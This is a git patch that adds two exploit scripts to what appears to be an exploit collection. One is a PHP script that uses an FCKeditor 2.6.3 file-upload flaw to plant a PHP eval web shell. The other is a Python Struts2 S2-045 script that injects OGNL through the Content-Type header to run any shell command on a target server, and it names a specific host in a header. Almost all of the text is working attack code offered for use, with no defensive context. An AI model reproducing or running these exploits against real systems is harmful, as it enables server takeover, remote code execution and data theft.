From d7f18481740959d9fd2dd5167f1ec6cc85709726 Mon Sep 17 00:00:00 2001
From: Mr5m1th <624995173@qq.com>
Date: Thu, 21 Sep 2017 21:14:05 +0800
Subject: [PATCH] 1

---
 .../FCKeditor_2.6.3/exp_fckeditor_2.6.3.php   | 55 +++++++++++++++++++
 struts2/struts2-045-exp/st-045.py             | 32 +++++++++++
 2 files changed, 87 insertions(+)
 create mode 100644 FCKeditor/FCKeditor_2.6.3/exp_fckeditor_2.6.3.php
 create mode 100644 struts2/struts2-045-exp/st-045.py

diff --git a/FCKeditor/FCKeditor_2.6.3/exp_fckeditor_2.6.3.php b/FCKeditor/FCKeditor_2.6.3/exp_fckeditor_2.6.3.php
new file mode 100644
index 0000000..a9f4950
--- /dev/null
+++ b/FCKeditor/FCKeditor_2.6.3/exp_fckeditor_2.6.3.php
@@ -0,0 +1,55 @@
+<?php
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+define(STDIN, fopen("php://stdin", "r"));
+$match = array();
+function http_send($host, $packet)
+{
+$sock = fsockopen($host, 80);
+while (!$sock)
+{
+print "\n[-] No response from {$host}:80 Trying again...";
+$sock = fsockopen($host, 80);
+}
+fputs($sock, $packet);
+while (!feof($sock)) $resp .= fread($sock, 1024);
+fclose($sock);
+print $resp;
+return $resp;
+}
+function connector_response($html)
+{
+global $match;
+return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
+}
+print "\n+------------------------------------------------------------------+";
+print "\n| FCKEditor Servelet Arbitrary File Upload Exploit |";
+print "\n+------------------------------------------------------------------+\n";
+if ($argc < 3)
+{
+print "\nUsage......: php $argv[0] host path\n";
+print "\nExample....: php $argv[0] localhost /\n";
+print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
+die();
+}
+$host = $argv[1];
+$path = ereg_replace("(/){2,}", "/", $argv[2]);
+$filename = "fvck.gif";
+$foldername = "fuck.php%00.gif";
+$connector = "editor/filemanager/connectors/php/connector.php";
+$payload = "-----------------------------265001916915724\r\n";
+$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
+$payload .= "Content-Type: image/jpeg\r\n\r\n";
+$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[cmd]) ?>'."\n";
+$payload .= "-----------------------------265001916915724--\r\n";
+$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $payload;
+print $packet;
+if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
+else print "\n[-] Job done! try http://${host}/$match[2] \n";
+?>
diff --git a/struts2/struts2-045-exp/st-045.py b/struts2/struts2-045-exp/st-045.py
new file mode 100644
index 0000000..91aed06
--- /dev/null
+++ b/struts2/struts2-045-exp/st-045.py
@@ -0,0 +1,32 @@
+import urllib
+import urllib2,sys
+from poster.encode import multipart_encode
+from poster.streaminghttp import register_openers
+cmd= sys.argv[2]
+# cd webapps\\ROOT & dir
+def main():
+    register_openers()
+    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
+    header["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0"
+    header["Accept"]="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+    header['Host']="www.okii.com"
+    header['Accept-Language']="zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3"
+    header["Content-Type"]='''%{(#nike='multipart/form-data').
+    (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
+    (#_memberAccess?(#_memberAccess=#dm):
+    ((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
+    (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
+    (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
+    (#context.setMemberAccess(#dm)))).(#cmd=' '''+cmd+''' ').
+    (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).
+    (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).
+    (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).
+    (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().
+    getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
+    (#ros.flush())}'''
+    request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
+    response = urllib2.urlopen(request)
+    print response.read()
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file